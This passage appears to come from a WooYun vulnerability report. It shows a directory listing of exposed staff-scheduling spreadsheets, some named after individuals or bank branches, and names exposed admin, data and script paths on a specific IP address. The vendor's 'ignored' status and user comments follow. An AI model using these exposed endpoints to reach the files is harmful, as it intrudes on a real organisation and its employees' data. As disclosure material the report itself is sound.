             2015年5月22日     8:45        11293 营业部5月份导入排班.xlsx
              2015年7月1日    19:13        11317 营业部6月份导入排班.xlsx
              2015年7月2日    18:41        11194 营业部7月份导入排班.xlsx
             2015年8月27日     8:11        11030 营业部8月份导入排班.xlsx
            2014年11月24日     9:45         9728 董重阳.xls
              2015年1月5日    14:41        16384 蒲河支行排班导入表.xls
            2014年11月24日     9:44        10752 调整排版导入表1.xls
             2015年6月30日    16:03        14336 辽河大街导入排班1.xls
             2015年8月31日     9:47        14848 辽河大街导入排班201508.xls
              2014年9月2日     9:12       119296 部门部分2(1).xls
              2014年9月2日     9:12       108544 部门部分2.xls
             2014年8月29日    15:17        61440 部门部分汇总.xls
             2015年4月30日    20:48        10916 重工北5月导入排班.xlsx
             2015年5月31日    21:17        10702 重工北6月导入排班.xlsx
              2015年8月1日    10:45        10631 重工北8月导入排班.xlsx
             2015年8月31日    21:10        10943 重工北9月导入排班.xlsx
             2015年3月18日    11:04        14336 长白班表.xls
            2014年10月29日     8:49        11776 预审中心导入排班10月.xls
             2014年10月8日    17:28        14336 领导 导入排班1.xls
              2015年2月2日    10:01        15360 黄河北导入排班1.xls
              2015年5月3日    15:37        16384 黄河北导入排班5月.xls
            2014年12月12日    10:41        10752 黄淼.xls


还有

http://59.46.94.68/systemmanage/
http://59.46.94.68/data
http://59.46.94.68/js等等

修复方案:

更新软件

版权声明:转载请注明来源 默之@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-12 23:28

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-09-08 00:38 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:134 | 多乌云、多机会!微信公众号: id:a301zls ...)

    屌爆了。。通用漏洞的节奏。。

  2. 2015-09-08 01:14 | sqlfeng ( 普通白帽子 | Rank:109 漏洞数:16 | 谁送我HHKB,我就嫁给她!)

    开门快递

  3. 2015-09-08 06:03 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:173 | ...........................................)

    Mark

  4. 2015-09-12 23:36 | 默之 ( 普通白帽子 | Rank:334 漏洞数:39 | 沉淀。)

    哎,修复了然后忽略

  5. 2015-09-13 00:03 | qglfnt ( 普通白帽子 | Rank:139 漏洞数:37 | 白天不懂夜的黑)

    关云长。。